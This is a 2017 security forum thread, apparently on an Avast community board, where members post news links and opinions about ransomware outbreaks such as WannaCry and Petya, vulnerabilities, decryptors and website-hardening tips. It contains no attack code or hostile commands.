So there are a lot of websites with bad CMS with vulnerable jQuery libraries. One could scan here: https://aw-snap.info/file-viewer/
Redleg alerts for many issues. I have been posting about these issues so many times now, and gave at these forums so many scanner examples in the "virus and worms", but I fear again it will be pearls for the swines and not much improvement will be seen and website admins and many hosters will never come to pick up "best practices". The main Internet Infrastructure is a very dangerous place, folks.
polonus
-
LetsEncrypt OSCP Fail: https://letsencrypt.status.io/
polonus
-
Spreading more rapidly than WannaCry.
https://www.wired.com/2017/05/another-ransomware-nightmare-brewing-ukraine/
-
Yep, Eddy, you are right and as can be expected there will be loads of victims still out on Win7.
Remember cybercrime has just recently been given an enormous boost from NSA's irresponsible zero-day policy,
sitting on such "feature holes" and not sharing it with those in the security community,
that may protect against abuse through other parties than these guv spooks (ordinairy cybercriminals).
Why put all of the Interwebs at risk? We are gonna be in for some not so nice surprise attacks in the coming future,
and also AV is better advised to protect against 'guv malcode 'if they have knowledge thereof and haven't protected us against it yet.
polonus (volunteer website security analyst and website error-hunter)
-
A new WannaCry decrypter.
https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d
-
Spreading more rapidly than WannaCry.
https://www.wired.com/2017/05/another-ransomware-nightmare-brewing-ukraine/
After reading that article I am so glad I have a solid backup plan.
-
Hi Para-Noid
Solid back-up plan is a must, but also a solid patch plan when patches are being served up.
All that had been patched systems were secure. All on non-exploitable OS were secure.
If it has hit you, you can feel sorry for yourself.
In Ukraine loads of folks out on not- always genuine Win7 and XP even.
There weren't that many victims in the USA where the threat was created...
only there those that did not pay attention fell victims to it.
polonus
-
Each and everyone seems after your data, the sniffers and spooks cannot be hold back from sniffing around your devices.
OK, you agreed to their software eula's, so you have nothing to say in the matter, but isn't this all not going a wee bit over the top?
Remotely collecting analytical user data from Netgear routers: https://community.netgear.com/t5/Nighthawk-WiFi-Routers/R7000-quot-Router-Analytics-Data-Collection-quot-Options-Grayed/td-p/1287480
polonus
-
Jaff Ransomware Switches to the WLU Extension and Gets a New Design
https://www.bleepingcomputer.com/news/security/jaff-ransomware-switches-to-the-wlu-extension-and-gets-a-new-design/ (https://www.bleepingcomputer.com/news/security/jaff-ransomware-switches-to-the-wlu-extension-and-gets-a-new-design/)
The following is the sample of Jaff ransomware I saw on Tuesday 2017-05-23:
SHA256 hash: 557306dc8005f9f6891939b5ceceb35a82efbe11bd1dede755d513fe6b5ac835
File size: 241,664 bytes
File location: C:\Users\[username]\AppData\Local\Temp\levinsky8.exe
It is not possible to decrypt the Jaff Ransomware WLU Variant
Unfortunately, it is not possible to decrypt .wlu files encrypted by the Jaff Ransomware for free.
-
Hacked in Translation
http://blog.checkpoint.com/2017/05/23/hacked-in-translation/
-
TLD domains with most malicious activity
https://blog.domaintools.com/2017/05/the-domaintools-report-spring-2017/
-
Data-Wiping Malware Takes Aim at IoT Devices
New breeds of malware specializing in wiping data are targeting internet of things (IoT) devices in homes and businesses.
https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/ (https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/)
-
Data-Wiping Malware Takes Aim at IoT Devices
New breeds of malware specializing in wiping data are targeting internet of things (IoT) devices in homes and businesses.
https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/ (https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/)
Ha, that's all we need your fridge to become a freezer and your freezer to become a fridge.
Personally I can't see the point of much of the IoT, smart components and dumb users.
-
Hi DavidR,
But these devices will appear now everywhere. I have alsoseen them already in exam rooms hanging on the ceiling, so-called to check human presence and student noise.
All these meters and gags are hung unto the Internet and centrally administered, also some people that had a job in the past looking after thermostats and window blinders etc. now facing to be made redundant and eventually turned out onto/into the streets.
It is a sad thing actually when you come to think of it, especially when the jobless have more in their purses as those with moderate wages, at least in some towns where I live (in the Netherlands where you're better off on the dole so to say) so there also is no initiative to do the iOT's job as a human being. Cleverbot is coming in outsmarting us all, and the managers behind these cyborgs bring them in.
polonus
-
(https://blog.avast.com/hs-fs/hubfs/Ransomware/BTC%20decryptor/01-btcware-ransomnote-001.png?t=1495620462427&width=680&name=01-btcware-ransomnote-001.png)
Avast releases decryptor tool for BTCWare ransomware
https://blog.avast.com/avast-releases-decryptor-tool-for-btcware-ransomware
-
Cookies Are the Original Ransomware
http://in.pcmag.com/opinion/114570/cookies-are-the-original-ransomware
Thus, the first ransomware message came from advertisers and website operators:
"we are not showing you this content unless you allow us to use cookies on your computer."
-
Newly discovered vulnerability raises fears of another WannaCry (*nix and Windows systems)
http://www.reuters.com/article/us-cyber-attack-samba-idUSKBN18L0GD
-
Newly discovered vulnerability raises fears of another WannaCry (*nix and Windows systems)
http://www.reuters.com/article/us-cyber-attack-samba-idUSKBN18L0GD
US-CERT >> https://www.us-cert.gov/ncas/current-activity/2017/05/24/Samba-Releases-Security-Updates
CVE-2017-7494.html: https://www.samba.org/samba/security/CVE-2017-7494.html
-
Data-Wiping Malware Takes Aim at IoT Devices
New breeds of malware specializing in wiping data are targeting internet of things (IoT) devices in homes and businesses.
https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/ (https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/)
Ha, that's all we need your fridge to become a freezer and your freezer to become a fridge.
Personally I can't see the point of much of the IoT, smart components and dumb users.
Very annoying when you open the door and you see 24 bottles of frozen beer ;D
-
Tech Support Scammers Are Exploiting Mass Hysteria Surrounding WannaCry
https://www.bleepingcomputer.com/news/security/tech-support-scammers-are-exploiting-mass-hysteria-surrounding-wannacry/
-
Researchers found 100.000 vulnerable Samba-systems.
Re: https://www.samba.org/samba/security/CVE-2017-7494.html
Sorry had already been posted,
polonus
-
Possibility to take over the UI and take over the the device completely (Android)
Google refuses to provide a patch/fix !
http://cloak-and-dagger.org/
-
Linguistic Analysis Suggests WannaCry Ransomware Is the Work of a Chinese-Speaking Crook
https://www.bleepingcomputer.com/news/security/linguistic-analysis-suggests-wannacry-ransomware-is-the-work-of-a-chinese-speaking-crook/ (https://www.bleepingcomputer.com/news/security/linguistic-analysis-suggests-wannacry-ransomware-is-the-work-of-a-chinese-speaking-crook/)
-
AES-NI Ransomware Dev Releases Decryption Keys Amid Fears of Being Framed for XData Outbreak
https://www.bleepingcomputer.com/news/security/aes-ni-ransomware-dev-releases-decryption-keys-amid-fears-of-being-framed-for-xdata-outbreak/ (https://www.bleepingcomputer.com/news/security/aes-ni-ransomware-dev-releases-decryption-keys-amid-fears-of-being-framed-for-xdata-outbreak/)
-
Is Avast protecting us against RoughTed the anti adware blocker malvertiser?
Read: https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/
polonus
-
NTFS bug lets anyone hang or crash Windows 7, 8.1
https://arstechnica.co.uk/information-technology/2017/05/in-a-throwback-to-the-90s-ntfs-bug-lets-anyone-hang-or-crash-windows-7-8-1/
-
Hacked in Translation – from Subtitles to Complete Takeover
http://blog.checkpoint.com/2017/05/23/hacked-in-translation/
-
German Threat Actor Spreads Houdini Worm on Pastebin
https://www.infosecurity-magazine.com/news/german-threat-actor-spreads-houdini/ (https://www.infosecurity-magazine.com/news/german-threat-actor-spreads-houdini/)
-
Will we browse against the machine or are we being borked by the machine?
Google blacklisting gets stricter for non-https-websites: https://blog.sucuri.net/2017/05/non-https-websites-blacklisted-for-passwords-without-ssl.html
Mozilla starts campaign against Google Chrome's Monoculture & Monopoly: https://medium.com/the-official-unofficial-firefox-blog/browse-against-the-machine-e793c0fee917
polonus
-
Will we browse against the machine or are we being borked by the machine?
Google blacklisting gets stricter for non-https-websites: https://blog.sucuri.net/2017/05/non-https-websites-blacklisted-for-passwords-without-ssl.html (https://blog.sucuri.net/2017/05/non-https-websites-blacklisted-for-passwords-without-ssl.html)
Mozilla starts campaign against Google Chrome's Monoculture & Monopoly: https://medium.com/the-official-unofficial-firefox-blog/browse-against-the-machine-e793c0fee917 (https://medium.com/the-official-unofficial-firefox-blog/browse-against-the-machine-e793c0fee917)
polonus
I learned a long time ago that knocking your enemies isn't a good way to make friends.
The cream usually rises to the top without needing to know other things down.
If Firefox wants to get a bigger share of the market share, simply become a better browser and it will attract users just like honey attracts flies. :)
-
Over 8,600 Security Flaws Found in Pacemaker Systems
https://www.bleepingcomputer.com/news/security/over-8-600-security-flaws-found-in-pacemaker-systems/ (https://www.bleepingcomputer.com/news/security/over-8-600-security-flaws-found-in-pacemaker-systems/)
-
Microsoft Quietly Patches Another Critical Malware Protection Engine Flaw
https://threatpost.com/microsoft-quietly-patches-another-critical-malware-protection-engine-flaw/125951/ (https://threatpost.com/microsoft-quietly-patches-another-critical-malware-protection-engine-flaw/125951/)
-
Honeypots for NSA SMB exploit take one attack every minute now:
Read: https://doublepulsar.com/eternalpot-lessons-from-building-a-global-nation-state-smb-exploit-honeypot-infrastructure-3f2a0b064ffe
Info credits: Kevin Beaumont
The USA and the world may have escaped from a very serious threat this time, it might have costed lives:
https://publicintelligence.net/dhs-ocia-wannacry/
Let us hope NSA learned this lesson well.
polonus
-
Anonymous Member Playing with Houdini RAT and MoWare Ransomware
https://www.bleepingcomputer.com/news/security/anonymous-member-playing-with-houdini-rat-and-moware-ransomware/ (https://www.bleepingcomputer.com/news/security/anonymous-member-playing-with-houdini-rat-and-moware-ransomware/)
-
Chrome Bug Allows Sites to Record Audio and Video Without a Visual Indicator
https://www.bleepingcomputer.com/news/security/chrome-bug-allows-sites-to-record-audio-and-video-without-a-visual-indicator/ (https://www.bleepingcomputer.com/news/security/chrome-bug-allows-sites-to-record-audio-and-video-without-a-visual-indicator/)
-
Split Tunnel SMTP Exploit Allows an Attacker to Inject Payloads Into Email Servers
https://www.bleepingcomputer.com/news/security/split-tunnel-smtp-exploit-allows-an-attacker-to-inject-payloads-into-email-servers/ (https://www.bleepingcomputer.com/news/security/split-tunnel-smtp-exploit-allows-an-attacker-to-inject-payloads-into-email-servers/)
-
Is the dark web safe? ... nope
Red on Red: The Attack Landscape of the Dark Web
http://blog.trendmicro.com/trendlabs-security-intelligence/red-on-red-the-attack-landscape-of-the-dark-web/
Conclusions
We didn’t think that hidden services operated within Tor would be attacked by other cyber-criminals. We were proven wrong—twice, in fact.
First, we were surprised when we learned that Tor proxies were making the Dark Web not as “dark” as some people would think. As a result, we started filtering out this traffic from our honeypots.
We thought this would prevent any further attacks, but we were mistaken. The attacks continued to take place. It turned out that cybercriminals were looking for services operated by other organizations and manually conducting attacks. Given that indexing and searching is more difficult within the Dark Web, this shows the amount of effort motivated criminals are putting into finding and disabling sites controlled by their competitors.
Apparently, there is no honor among thieves.
-
Honeypots for NSA SMB exploit take one attack every minute now:
Read: https://doublepulsar.com/eternalpot-lessons-from-building-a-global-nation-state-smb-exploit-honeypot-infrastructure-3f2a0b064ffe
Info credits: Kevin Beaumont
The USA and the world may have escaped from a very serious threat this time, it might have costed lives:
https://publicintelligence.net/dhs-ocia-wannacry/
Let us hope NSA learned this lesson well.
polonus
Quote
One thing I will say — I don’t want to name the vendors, but some of the biggest next-generation security products simply aren’t detecting SMB attacks nearly well enough. Malware regularly infects these systems, and they have to be reimaged as a result. It is amazing seeing next gen, premium tools with machine learning etc running Coin Miners and remote access trojans delivered via old exploits, with the tools not even noticing. It has been very eye opening for me. The marketing to reality Venn diagram here isn’t so Venn. At times it is so bad it is actually jaw dropping seeing certain attacks not being detected.
-
Only 4% of WordPress websites have the latest version and all patches installed:
https://securityintelligence.com/relying-on-data-to-mitigate-the-risk-of-wordpress-website-hijacking/
Check at Quttera and Sucuri's and also here: hackertarget.com/wordpress-security-scan/
Check sri hashes here: https://sritest.io/ and retirable jQuery libraries here: http://retire.insecurity.today/#
Also check here: https://observatory.mozilla.org/ for a rough and dirty scan of insecurity.
polonus (volunteer website security analyst and website error-hunter)
-
Yandex Ukraine offices came under scrutiny from SBU: https://www.theregister.co.uk/2017/05/30/yandexs_ukraine_offices_raided_for_treason/
polonus
-
Intel chip flaw allows hackers to hijack thousands of PCs
http://www.telegraph.co.uk/technology/2017/05/08/intel-chip-flaw-allows-hackers-hijack-thousands-pcs/ (http://www.telegraph.co.uk/technology/2017/05/08/intel-chip-flaw-allows-hackers-hijack-thousands-pcs/)
Dated May 8th, somehow not noted: Apparently affects commercial systems.
-
Intel chip flaw allows hackers to hijack thousands of PCs
http://www.telegraph.co.uk/technology/2017/05/08/intel-chip-flaw-allows-hackers-hijack-thousands-pcs/ (http://www.telegraph.co.uk/technology/2017/05/08/intel-chip-flaw-allows-hackers-hijack-thousands-pcs/)
Dated May 8th, somehow not noted: Apparently affects commercial systems.
Isn't it so damn typical build a backdoor and people will take advantage of it.
EDIT: Not sure why it would only be on commercial systems. I don't believe Intel built specific chips for commerce.
-
News Brief: BitKangoroo Ransomware Deletes Your Files If You Do not Pay
https://www.bleepingcomputer.com/news/security/news-brief-bitkangoroo-ransomware-deletes-your-files-if-you-do-not-pay/
-
Not new May 8, 2017
-
Man Linked to Auto Parts Store Behind Bachosens Malware
https://www.bleepingcomputer.com/news/security/man-linked-to-auto-parts-store-behind-bachosens-malware/ (https://www.bleepingcomputer.com/news/security/man-linked-to-auto-parts-store-behind-bachosens-malware/)
-
Security Researchers Are Gathering Funds to Buy Future Shadow Brokers Exploits
https://www.bleepingcomputer.com/news/security/security-researchers-are-gathering-funds-to-buy-future-shadow-brokers-exploits/ (https://www.bleepingcomputer.com/news/security/security-researchers-are-gathering-funds-to-buy-future-shadow-brokers-exploits/)
UPDATE [June 1, 05:00 AM ET]: Due to legal concerns, the team behind this campaign has pulled out and shut down the project. Statements here and here.
-
Fireball Malware Infects 20% of Corporate Networks Worldwide
https://www.infosecurity-magazine.com/news/fireball-infects-20-of-corporate/
-
Kmart Point of Sale Hacked with 'Undetectable' Malware
https://www.infosecurity-magazine.com/news/kmart-point-of-sale-hacked/ (https://www.infosecurity-magazine.com/news/kmart-point-of-sale-hacked/)
-
More about Fireball
http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/
-
Identity Manager OneLogin Has Suffered a Nasty Looking Data Breach
https://motherboard.vice.com/en_us/article/identity-manager-onelogin-has-suffered-a-nasty-looking-data-breach
https://www.onelogin.com/blog/may-31-2017-security-incident
-
Russian State Hackers Use Britney Spears Instagram Posts to Control Malware
https://www.bleepingcomputer.com/news/security/russian-state-hackers-use-britney-spears-instagram-posts-to-control-malware/ (https://www.bleepingcomputer.com/news/security/russian-state-hackers-use-britney-spears-instagram-posts-to-control-malware/)
-
Microsoft Internet Explorer Multiple Vulnerabilities
Secunia Advisory SA76672
Where: From remote
Impact: Security Bypass, Spoofing, System access
Solution Status: Vendor Patch
Software:
Microsoft Internet Explorer 10.x
Microsoft Internet Explorer 11.x
Microsoft Internet Explorer 9.x
CVE Reference(s): CVE-2017-0064, CVE-2017-0222, CVE-2017-0226, CVE-2017-0228, CVE-2017-0231, CVE-2017-0238
-
Dangerous new AMT SOL malware abused by hackers. Can avast protect us?
Read: https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/
There is more trouble like WannaCry in the pipeline for us all. Why supervisors do not make an effort to make the general infrastructure somewhat less holed with all those that wanna spook on the general public or abuse them, big gubberment and big commerce alike.
All small remainders of your privacy and other rights will go down the drain when this tracking and surveillance tornado is not brought to calm down. The sad thing is there seems no end to this.
polonus
-
Ransomware now available for mac computer's - http://www.myce.com/news/security-researchers-discover-ransomware-apple-computers-tor-network-82111/ (http://www.myce.com/news/security-researchers-discover-ransomware-apple-computers-tor-network-82111/)
Nothing new: http://blog.trendmicro.com/ransomware-is-a-growing-risk-on-macs/
-
Microsoft Patches Windows XP Again As Part of June Patch Tuesday
http://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-patches-windows-xp-again-june-patch-tuesday/
-
Microsoft should seriously consider retiring Windows XP , Vista, 8.1 for good. It's costing Microsoft more money and more human resources to baby sit these old Windows OS. Business owners, educational institution and etc should consider going to Windows 10. The institute that I go to they have already implemented Windows 10 in all of the computers and I am our neighboring country Australia has followed us. Why can't other country follow the same thing and move to Windows 10.
This was hit just yesterday https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing
-
Microsoft should seriously consider retiring Windows XP , Vista, 8.1 for good. It's costing Microsoft more money and more human resources to baby sit these old Windows OS. Business owners, educational institution and etc should consider going to Windows 10. The institute that I go to they have already implemented Windows 10 in all of the computers and I am our neighboring country Australia has followed us. Why can't other country follow the same thing and move to Windows 10.
This was hit just yesterday https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing (https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing)
Changing to Windows 10 still doesn't prevent the user for infecting the system.
-
Considerable Brute Force Attacks on Word Press CMS:
-https://www.wordfence.com/blog/2017/06/home-router-botnet-resumes-attacks/
Broke that link because of unsollicited adware for paid audit and subscription, if anyone wonders why I broke it.
polonus
-
Microsoft should seriously consider retiring Windows XP , Vista, 8.1 for good. It's costing Microsoft more money and more human resources to baby sit these old Windows OS. Business owners, educational institution and etc should consider going to Windows 10. The institute that I go to they have already implemented Windows 10 in all of the computers and I am our neighboring country Australia has followed us. Why can't other country follow the same thing and move to Windows 10.
This was hit just yesterday https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing (https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing)
Changing to Windows 10 still doesn't prevent the user for infecting the system.
Yes I agree but they will be much more safer and getting security updates from Microsoft and also it's the most up to date Windows OS. They just need to apply common sense.
-
Samsung Magician fails to update itself securely (SSD's)
http://www.kb.cert.org/vuls/id/846320
-
Windows 10 without creator's update & device guard stays vulnerable to EternalBlue & EternalRomance NSA exploits as adapted for Win 10 by Shadow-Brokers' to exploit your regular Windows 10.
Re: https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/
Why not run Windows 10 under linux in virtual box, and then have the best of both worlds, as we now should know that Windows (influenced by NSA etc.) can never really be trusted to be fully secure to specific end-users.
Patch and upgrade and you are and maybe feel more secure, but never fully secure in the surveillance state that we find ourselves to reside in to-day.
Propriety software, well you never know, what you are up against/
Open software is open and the code can be checked, so irresponsible big gubberment forces won't sit silently on Zero-days for five years at a strechtch, before proliferation takes place through leaks and/or exploits are found up, and the hacks fall into the hands of cybercriminals.
polonus
-
Erebus Resurfaces as Linux Ransomware
http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/
-
Microsoft admits it disables anti-virus software in response to Kaspersky's EU complaint
https://www.theverge.com/2017/6/20/15836208/microsoft-kaspersky-eu-anti-virus-complaint-response
-
Microsoft admits it disables anti-virus software in response to Kaspersky's EU complaint
https://www.theverge.com/2017/6/20/15836208/microsoft-kaspersky-eu-anti-virus-complaint-response (https://www.theverge.com/2017/6/20/15836208/microsoft-kaspersky-eu-anti-virus-complaint-response)
IMHO, better to disable something not compatible than allow it to run and crash the system.
-
Another chapter in Drupalgeddon: https://www.drupal.org/PSA-2014-003
Serious hole to be patched via an update.
CMS it can be a constant pain in the neck, sometimes. Drupal, Word Press etc.
polonus
-
First things learned by toddlers is to keep their hands out of the cookie-jar.
Part of education learnt with your first visit to a big department candy store.
Never forget that for the rest of your life, part of your Kinderstube education.
Now these mechanisms often fail for spoiled young folk even when they grow older.
What you put in is being turned out. Hey, Sparta, do you hear me?
Now that society educates and you're not taught such things evidently by your parents or grandparents or whatever,
you get such news as this:
https://www.buzzfeed.com/jasonleopold/cia-vending-thefts?utm_term=.gpVkpnXNV#.qkmEbm69d
Nice to be protected by those from gubberment you cannot even trust as far as a candybar's long :o
polonus
-
Bad news and a sure cause of more Win10 insecurity coming: https://www.theregister.co.uk/2017/06/23/windows_10_leak/
General issues with Microsoft Software according to GNU's: https://www.gnu.org/proprietary/malware-microsoft.html
These are insecure days for Windows end-users.
polonus
-
TheRegister is completely wrong.
It wasn't 32 Tb but only 1,2 Gb and a lot of the code never made it into the final build.
This is where the code was uploaded :
https://www.betaarchive.com/forum/viewtopic.php?t=37283
-
Hi Eddy,
If that should be otherwise, would not you be the first to debunk it as quickly as possible?
Some use this with a VM to feel a bit more comfy , see: https://www.youtube.com/watch?v=v-CzBkbISLQ
According to this source we can conclude then they are telling lies in commision:
https://arstechnica.com/information-technology/2017/06/32tb-of-windows-10-beta-builds-driver-source-code-leaked/
Since WannaCry I do not trust M$ very much security-wise, also due to NSA holding M$ sort of hostage.
Do not look at propriety code, those that do are excluded from work in the IT sector for a couple of years, because of the risks.
With open source however you are free to skim over the source, that is why it is open.
polonus
-
Just waiting for backdoors for strong encryption. Debate ongoing: https://www.attorneygeneral.gov.au/Mediareleases/Pages/2017/SecondQuarter/Tackling-Encryption-and-Border-Security-key-Priorities-at-Five-Eyes-Meeting-in-Ottawah.asp
Just a bit more of the common "t"and "p" arguments will do the job, and these forces will achieve what they are after, despite of the fact that knowledge of backdoors will proliferate to cybercriminals and will make everyone's life a bit less secure also business competition (commercial spies - what businessman is taking his smartphone to the States for instance as it comes backdoored by design from Galaxy 4 onwards).
But this mechanism does not hamper those without technical knowledge how such things work, while those to decide are often not the ones ,that could do real technical risk-management to keep us all safe(r).
polonus
-
Insecurity coming, how you gonna flush dns when you have no command prompt nor Power Shell.
Shouldn't this version be taken on hold, because it is too restrictive, and has also the known macro vulnerabilities there.
Re: https://arstechnica.com/information-technology/2017/06/microsoft-should-shore-up-windows-10-ss-security-then-offer-it-to-everyone/
polonus
-
All of a sudden today, Avast is giving me a warning that my webmail account for CenturyTel is not safe - phishing, I think it said. It continues to give me the warning even though I set it in the exceptions. Even when I try to do a reply. Of course, I override it but how can I get it to STOP?
BTW, The verification really sucks - I have enough vision problems as it is and have a super hard time reading the letters and the sound option doesn't work at all.
-
1. All of a sudden today, Avast is giving me a warning that my webmail account for CenturyTel is not safe - phishing, I think it said. It continues to give me the warning even though I set it in the exceptions. Even when I try to do a reply. Of course, I override it but how can I get it to STOP?
2. BTW, The verification really sucks - I have enough vision problems as it is and have a super hard time reading the letters and the sound option doesn't work at all.
1. Start a new topic: https://forum.avast.com/index.php?action=post;board=4
2. Only needed for your first 3 posts. (Spam protection)
-
Again a Windows Defender emulator hole found up with a fuzzer after porting Windows Defender onto linux.
Read here: https://twitter.com/taviso/status/878314575149506561
https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2
Will Kaspersky's start to moan again, while Tavis Ormandy makes that Windows Defender gets more secure all the time?
polonus
-
11% increase in ransomware within a year
https://securelist.com/ksn-report-ransomware-in-2016-2017/78824/
-
11% increase in ransomware within a year
https://securelist.com/ksn-report-ransomware-in-2016-2017/78824/
My only surprise would be 'only an 11% increase' in a year. It seems to have been massive recently.
-
11% increase in ransomware within a year
https://securelist.com/ksn-report-ransomware-in-2016-2017/78824/ (https://securelist.com/ksn-report-ransomware-in-2016-2017/78824/)
My only surprise would be 'only an 11% increase' in a year. It seems to have been massive recently.
Not if you used Avast:
https://blog.avast.com/avast-and-avg-only-free-antivirus-score-100-av-comparatives-real-world-test
-
Doesn't matter what you use(d), there still is a 11% increase in (new) ransomware.
It is not about how many things are blocked, but detected.
-
Massive Petya Ransomware Attack (GoldenEye)
(http://screencast-o-matic.com/screenshots/u/Lh/1498589006645-46653.png)
More information here (https://www.cnet.com/news/unprecedented-cyberattack-hits-businesses-across-europe/?ftag=CAD1acfa04&bhid=19917032625079717126003489967847) and here (https://labs.bitdefender.com/2017/06/massive-goldeneye-ransomware-campaign-slams-worldwide-users/)
-
Hi bob3160,
Breaking news here indeed, at a grand scale.
Well someone should finally uphold the American constitution against these NSA spooks, thinking they are above the law, letting this out into cyberspace, now causing global havoc & damage through their EternalBlue zero-day proliferation, also giving Microsoft a bad name. Ransomeware-worms in the making and causing havoc around the globe.
Globally firms are devastated by Peyta in Ukraine and in Russia and now also in the port of Rotterdam, the Netherlands, e.g. Maersk Logistics, http://www.apmterminals.com/500.html?aspxerrorpath=/ -> https://asafaweb.com/Scan?Url=www.apmterminals.com%2F500.html%3Faspxerrorpath%3D Read: http://www.nnit.com/OfferingsAndArticles/Pages/COWI-Upgrades-its-IT-Security.aspx (there were threats from cybercriminals). See also: http://toolbar.netcraft.com/site_report?url=http%3A%2F%2Fwww.apmterminals.com%2F500.html%3Faspxerrorpath%3D%2F
The malware, what they now think is a worm, spreading like wildfire, encrypts the MFT on the hard disk (master file table).
CERT's in all sort of countries now up in arms. Victims have no more than 30 minutes to take their systems off of the grid and shut them down. Thank you, foks, for making this crap possible (ironic mode on).
polonus
P.S. Great avast is out in the trenches against this, keeping a finger on the pulse through the Wifi-Inspector. 39 million servers vulnerable and haven't been patched. Read: https://blog.avast.com/petya-based-ransomware-using-eternalblue-to-infect-computers-around-the-world
Damian
-
Local Killswitch for Peyta.
Seems there is a killswitch now, creating c:\windows\perfc as the ransomeware checks that file and then stops.
Info credits: Amit Serper. AppLocker-feature to block the execution of "perfc.dat" should also do the trick according to Kaspersky Lab's.
pol
P.S. For what it is worth: https://www.bleepingcomputer.com/news/security/petya-ransomwares-encryption-defeated-and-password-generator-released/
-
https://blog.kaspersky.com/new-ransomware-epidemics/17314/
https://securelist.com/schroedingers-petya/78870/
-
Vaccine, not Killswitch, Found for Petya (NotPetya) Ransomware Outbreak
https://www.bleepingcomputer.com/news/security/vaccine-not-killswitch-found-for-petya-notpetya-ransomware-outbreak/ (https://www.bleepingcomputer.com/news/security/vaccine-not-killswitch-found-for-petya-notpetya-ransomware-outbreak/)
-
Microsoft Security Advisory 4033453
Vulnerability in Azure AD Connect Could Allow Elevation of Privilege
https://technet.microsoft.com/library/security/4033453.aspx
-
SLocker Mobile Ransomware Starts Mimicking WannaCry
https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/
-
New Azer CryptoMix Ransomware Variant Released
https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/ (https://www.bleepingcomputer.com/news/security/new-azer-cryptomix-ransomware-variant-released/)
V.T-https://www.virustotal.com/en/file/6f5f3bd509c22f0aec4a55fd4d08b7527be4708145b760bc3bd955c6e7538064/analysis/ (https://www.virustotal.com/en/file/6f5f3bd509c22f0aec4a55fd4d08b7527be4708145b760bc3bd955c6e7538064/analysis/)
-
Decryptor Released for the Mole02 CryptoMix Ransomware Variant
https://www.bleepingcomputer.com/news/security/decryptor-released-for-the-mole02-cryptomix-ransomware-variant/ (https://www.bleepingcomputer.com/news/security/decryptor-released-for-the-mole02-cryptomix-ransomware-variant/)
-
New BTCWare Ransomware Decrypter Released for the Master Variant
https://www.bleepingcomputer.com/news/security/new-btcware-ransomware-decrypter-released-for-the-master-variant/ (https://www.bleepingcomputer.com/news/security/new-btcware-ransomware-decrypter-released-for-the-master-variant/)
-
https://security.googleblog.com/2016/10/distrusting-wosign-and-startcom.html
While not sticking to the rules, these certifiers have endangered website visitors and are not trusted any longer by Google.
Background read: https://www.lowendtalk.com/discussion/95618/google-chrome-distrusting-wosign-and-startcom-certificates
Comics can tell more than a thousand words: -http://dilbert.com/search_results?terms=Vast+Power+Of+Certification
pol
-
Most providers and CDNs in cahoots with Big GubbermentRead: https://www.eff.org/who-has-your-back-2017
This not about protecting your personal data through security technology, best practices etc, this just touches transparency,
policy towards end-users, Amazon and Whatsapp has a bad reputation for the total lack of protecting your data against snoopers.
Adobe, Amazon, Apple, Facebook, Google, LinkedIn, Microsoft, T-Mobile, Twitter, WhatsApp, WordPress en Yahoo. Providers Verizon, T-Mobile, Comcast en AT&T just scored one star in protecting your data from Government requests.
polonus
-
Big Campaign in USA for Netneutrality:
https://www.battleforthenet.com/july12/
polonus
-
Big Campaign in USA for Netneutrality:
https://www.battleforthenet.com/july12/
polonus
Knowing the political climate here in the good ol' U.S. of A. this looks like a losing cause. :'(
We can always hope. ;)
-
Data of 14 Million Verizon Customers Exposed in Server Snafu
https://www.bleepingcomputer.com/news/security/data-of-14-million-verizon-customers-exposed-in-server-snafu/
-
Don't Open SPAM Containing Password Protected Word Docs
(Should be obvious at this point.)
https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
-
The WPSetup Attack: New Campaign Targets Fresh WordPress Installs
Read: https://www.wordfence.com/blog/2017/07/wpsetup-attack/
The best method for "wizzard"-like setups for webapplications is to have the set-up done locally at home, and when the set up is what you like it to be, then you are to rsync it to the webserver, together with the right permissions, security and unnecessary files being deleted.
Even better stil is using git and make sure through a .gitignore that no vulnerable files land onto your live server.
Whenever you do not need an interactive site really, in that case you should make use of a static site generator! (When you need comments on posts you could do that using Disqus - https://gohugo.io/extras/comments/)
For starters there is Hugo, giving the least problems for beginners; http://gohugo.io/
(Info credits go to Soeperees and Neb Poorten, thanks folks)
polonus (volunteer website secruity analyst and website error hunter)
-
"Particle" Chrome Extension Sold to New Dev Who Immediately Turns It Into Adware
https://www.bleepingcomputer.com/news/security/-particle-chrome-extension-sold-to-new-dev-who-immediately-turns-it-into-adware/
-
New way to boycot or undermine: https://www.theregister.co.uk/2017/07/13/bitcoins_might_just_vanish_into_the_ether/
polonus
-
Retire QuickTime for Windows for good, uninstall!
Read why? Re: https://www.us-cert.gov/ncas/bulletins/SB17-191
polonus (volunteer website security analyst and website error-hunter)
-
Researchers find up serious holes in Web Ex: https://bugs.chromium.org/p/project-zero/issues/detail?id=1324
11 holes in Radius found in DHCP and RADIUS packet parsers via fuzzing: https://guidovranken.wordpress.com/2017/07/17/11-remote-vulnerabilities-inc-2x-rce-in-freeradius-packet-parsers/
polonus (volunteer website security analyst and website error-hunter)
